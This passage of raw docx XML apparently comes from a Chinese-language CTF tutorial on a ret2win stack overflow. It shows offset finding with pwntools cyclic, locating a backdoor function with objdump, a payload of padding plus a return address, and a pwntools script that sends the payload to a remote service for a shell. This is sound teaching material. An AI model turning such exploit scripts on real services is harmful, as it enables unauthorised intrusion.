      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cyclic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n=4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>'agaa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544845F8" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="方法-b看-rip-下方的-0x-提示"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>RIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下方的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;0x...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B1203E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>► 0x401185 &lt;main+67&gt;    ret    &lt;0x6161686161616761&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EF2F7" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>0x6161686161616761</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>按小端序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转为字节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BE517" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存顺序：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>61 67 61 61 61 68 61 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58008AD5" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>61 67 61 61</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → ASCII = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>'agaa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAE14D" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键原则：取返回地址在内存中的前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节（小端序），作为字符串查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13020B3C" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="计算偏移量"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075C27B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cyclic_find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>不要指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n=8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（除非你明确用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cyclic(100, n=8)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2BFAD" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"from pwn import *; print(cyclic_find(b'agaa'))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74702543" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出示例：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D527E3E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这个数字就是偏移量（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>字节是填充，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 24~31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>字节覆盖返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1D097" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="构造最终-payload"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造最终</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BEFF3" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="X81b6deceec3ffe0d480f59acb96c15b2088ad69"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定目标函数地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E0EE81" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDA</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ghidra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到后门函数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612AB1AA" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ objdump -t pwn1 | grep fun</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>0000000000401186 g     F .text  0000000000000010              fun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEEA8B1" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>0x401186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA514A" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="X1a9012ab3add62dc4b8b78611b1c83b2bf79df9"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D4631" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>b"A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t>0x401186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679ABC7C" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="Xbae6aa4298f5f9f1f2faad43346b2b15e44e376"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地验证（可选）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DD676" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"from pwn import *; open('payload', 'wb').write(b'A'*23 + p64(0x401186))"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./pwn1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59388B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果程序跳转到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或打印</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说明成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB17DE" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="X60adcd130ea71733e3c441bb1dbc108b5688af6"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击远程服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F84BB" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>连接远程</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>b"A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t>0x401186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>r.sendline(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>交互拿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>r.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03AEAF" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="2B69460F">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451449F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="栈溢出的原理"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出的原理</w:t>
      </w:r>
    </w:p>
